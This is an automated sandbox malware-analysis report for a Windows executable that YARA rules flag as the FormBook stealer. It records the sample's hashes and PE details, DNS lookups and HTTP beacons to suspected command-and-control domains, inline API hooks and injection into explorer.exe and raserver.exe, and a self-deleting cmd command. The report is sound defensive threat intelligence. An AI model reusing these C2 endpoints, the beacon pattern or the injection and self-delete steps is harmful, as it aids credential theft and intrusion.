                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.elbt-ag.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.elbt-ag.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
103.224.212.212 | www.theanhedonia.com | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
104.21.34.218 | www.123bu6.shop | United States | 13335 | CLOUDFLARENETUS | true
                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                          Analysis ID:1392769
                                                                          Start date and time:2024-02-15 12:13:55 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 32s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:1
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:jqPZZhDmjh.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@6/0@5/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 32
                                                                          • Number of non-executed functions: 318
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:14:46 | API Interceptor | 1794750x Sleep call for process: explorer.exe modified
12:15:27 | API Interceptor | 2229284x Sleep call for process: raserver.exe modified
                                                                          No created / dropped files found
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.3910560197330035
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:jqPZZhDmjh.exe
                                                                          File size:185'856 bytes
                                                                          MD5:c4127213fc83e9b8d166d5731bac598a
                                                                          SHA1:c54a87820173ca9fae8809dcc7e99f54b2dac173
                                                                          SHA256:ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498
                                                                          SHA512:ca28c7b389239c76b1261374c55e48e22bc87a4bc55eb744a1ea834bb08a1df0ea5d6d40989f742de63c72faf70babd61a0c94867a5710b0d162adfb81b026ed
                                                                          SSDEEP:3072:kh5MEfXo5Fwd38wi8kHaJ47Fxp00CABkW+ALRYpnz:kxFR8b8QaJ47bp0BGkW+f
                                                                          TLSH:0B04AE36D602C070F2B215B5B66D1B7B883D0E357294A4EAA3E12AE05FE48D5F53931F
                                                                          File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L......F...................................................
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x187f080
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x1860000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x469FFD15 [Fri Jul 20 00:08:53 2007 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:
                                                                          Programming Language:
                                                                          • [C++] VS2010 SP1 build 40219
                                                                          • [ASM] VS2010 SP1 build 40219
                                                                          • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2d0e4 | 0x2d200 | 4d55976a09edf34b27c6c372f1796c5b | False | 0.7615997229916898 | data | 7.406763653212094 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 15, 2024 12:15:21.485227108 CET | 49704 | 80 | 192.168.2.6 | 104.21.34.218
Feb 15, 2024 12:15:21.602173090 CET | 80 | 49704 | 104.21.34.218 | 192.168.2.6
Feb 15, 2024 12:15:21.602272987 CET | 49704 | 80 | 192.168.2.6 | 104.21.34.218
Feb 15, 2024 12:15:21.602364063 CET | 49704 | 80 | 192.168.2.6 | 104.21.34.218
Feb 15, 2024 12:15:21.719358921 CET | 80 | 49704 | 104.21.34.218 | 192.168.2.6
Feb 15, 2024 12:15:22.111494064 CET | 49704 | 80 | 192.168.2.6 | 104.21.34.218
Feb 15, 2024 12:15:22.229284048 CET | 80 | 49704 | 104.21.34.218 | 192.168.2.6
Feb 15, 2024 12:15:22.229399920 CET | 49704 | 80 | 192.168.2.6 | 104.21.34.218
Feb 15, 2024 12:15:42.103519917 CET | 49706 | 80 | 192.168.2.6 | 103.224.212.212
Feb 15, 2024 12:15:42.252888918 CET | 80 | 49706 | 103.224.212.212 | 192.168.2.6
Feb 15, 2024 12:15:42.253035069 CET | 49706 | 80 | 192.168.2.6 | 103.224.212.212
Feb 15, 2024 12:15:42.253113031 CET | 49706 | 80 | 192.168.2.6 | 103.224.212.212
Feb 15, 2024 12:15:42.423163891 CET | 80 | 49706 | 103.224.212.212 | 192.168.2.6
Feb 15, 2024 12:15:42.423192978 CET | 80 | 49706 | 103.224.212.212 | 192.168.2.6
Feb 15, 2024 12:15:42.423345089 CET | 49706 | 80 | 192.168.2.6 | 103.224.212.212
Feb 15, 2024 12:15:42.423372030 CET | 49706 | 80 | 192.168.2.6 | 103.224.212.212
Feb 15, 2024 12:15:42.572719097 CET | 80 | 49706 | 103.224.212.212 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 15, 2024 12:15:21.331434965 CET | 55128 | 53 | 192.168.2.6 | 1.1.1.1
Feb 15, 2024 12:15:21.484211922 CET | 53 | 55128 | 1.1.1.1 | 192.168.2.6
Feb 15, 2024 12:15:41.862515926 CET | 61320 | 53 | 192.168.2.6 | 1.1.1.1
Feb 15, 2024 12:15:42.102526903 CET | 53 | 61320 | 1.1.1.1 | 192.168.2.6
Feb 15, 2024 12:16:01.283910036 CET | 49465 | 53 | 192.168.2.6 | 1.1.1.1
Feb 15, 2024 12:16:01.420042992 CET | 53 | 49465 | 1.1.1.1 | 192.168.2.6
Feb 15, 2024 12:16:21.597021103 CET | 55630 | 53 | 192.168.2.6 | 1.1.1.1
Feb 15, 2024 12:16:21.730669975 CET | 53 | 55630 | 1.1.1.1 | 192.168.2.6
Feb 15, 2024 12:16:42.849379063 CET | 53727 | 53 | 192.168.2.6 | 1.1.1.1
Feb 15, 2024 12:16:43.012341976 CET | 53 | 53727 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 15, 2024 12:15:21.331434965 CET | 192.168.2.6 | 1.1.1.1 | 0x36ec | Standard query (0) | www.123bu6.shop | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:15:41.862515926 CET | 192.168.2.6 | 1.1.1.1 | 0x3ca4 | Standard query (0) | www.theanhedonia.com | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:16:01.283910036 CET | 192.168.2.6 | 1.1.1.1 | 0x6365 | Standard query (0) | www.soulheroes.online | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:16:21.597021103 CET | 192.168.2.6 | 1.1.1.1 | 0x1613 | Standard query (0) | www.roelofsen.online | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:16:42.849379063 CET | 192.168.2.6 | 1.1.1.1 | 0xa63b | Standard query (0) | www.truedatalab.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 15, 2024 12:15:21.484211922 CET | 1.1.1.1 | 192.168.2.6 | 0x36ec | No error (0) | www.123bu6.shop | | 104.21.34.218 | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:15:21.484211922 CET | 1.1.1.1 | 192.168.2.6 | 0x36ec | No error (0) | www.123bu6.shop | | 172.67.165.153 | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:15:42.102526903 CET | 1.1.1.1 | 192.168.2.6 | 0x3ca4 | No error (0) | www.theanhedonia.com | | 103.224.212.212 | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:16:01.420042992 CET | 1.1.1.1 | 192.168.2.6 | 0x6365 | Name error (3) | www.soulheroes.online | none | none | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:16:21.730669975 CET | 1.1.1.1 | 192.168.2.6 | 0x1613 | Name error (3) | www.roelofsen.online | none | none | A (IP address) | IN (0x0001) | false
Feb 15, 2024 12:16:43.012341976 CET | 1.1.1.1 | 192.168.2.6 | 0xa63b | No error (0) | www.truedatalab.com | | 0.0.0.0 | A (IP address) | IN (0x0001) | false
                                                                          • www.123bu6.shop
                                                                          • www.theanhedonia.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49704 | 104.21.34.218 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 15, 2024 12:15:21.602364063 CET | 169 | OUT | GET /gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxV HTTP/1.1
                                                                          Host: www.123bu6.shop
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49706 | 103.224.212.212 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 15, 2024 12:15:42.253113031 CET | 174 | OUT | GET /gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV HTTP/1.1
                                                                          Host: www.theanhedonia.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Feb 15, 2024 12:15:42.423163891 CET | 438 | IN | HTTP/1.1 302 Found
                                                                          date: Thu, 15 Feb 2024 11:15:42 GMT
                                                                          server: Apache
                                                                          set-cookie: __tad=1707995742.5560590; expires=Sun, 12-Feb-2034 11:15:42 GMT; Max-Age=315360000
                                                                          location: http://ww25.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV&subid1=20240215-2215-4287-a810-a983fbd73ffa
                                                                          content-length: 2
                                                                          content-type: text/html; charset=UTF-8
                                                                          connection: close
                                                                          Data Raw: 0a 0a
                                                                          Data Ascii:


                                                                          Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5


                                                                          Target ID:0
                                                                          Start time:12:14:38
                                                                          Start date:15/02/2024
                                                                          Path:C:\Users\user\Desktop\jqPZZhDmjh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\jqPZZhDmjh.exe
                                                                          Imagebase:0x970000
                                                                          File size:185'856 bytes
                                                                          MD5 hash:C4127213FC83E9B8D166D5731BAC598A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:12:14:38
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.3313647278.000000000DF94000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:12:14:41
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\SysWOW64\raserver.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                          Imagebase:0x880000
                                                                          File size:107'520 bytes
                                                                          MD5 hash:D1053D114847677185F248FF98C3F255
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:4
                                                                          Start time:12:14:45
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\Desktop\jqPZZhDmjh.exe"
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:12:14:45
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:1.4%
                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                            Signature Coverage:5.8%
                                                                            Total number of Nodes:554
                                                                            Total number of Limit Nodes:60

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 232 97ace0-97acfc 233 97ad04-97ad09 232->233 234 97acff call 98cc40 232->234 235 97ad0f-97ad1d call 98d060 233->235 236 97ad0b-97ad0e 233->236 234->233 239 97ad1f-97ad2a call 98d2e0 235->239 240 97ad2d-97ad3e call 98b490 235->240 239->240 245 97ad57-97ad5a 240->245 246 97ad40-97ad54 LdrLoadDll 240->246 246->245
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0097AD52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction ID: a425d6dbdd5a507ac6a708628e3b81d0e99169d073d9f89bdf3806466f5fc072
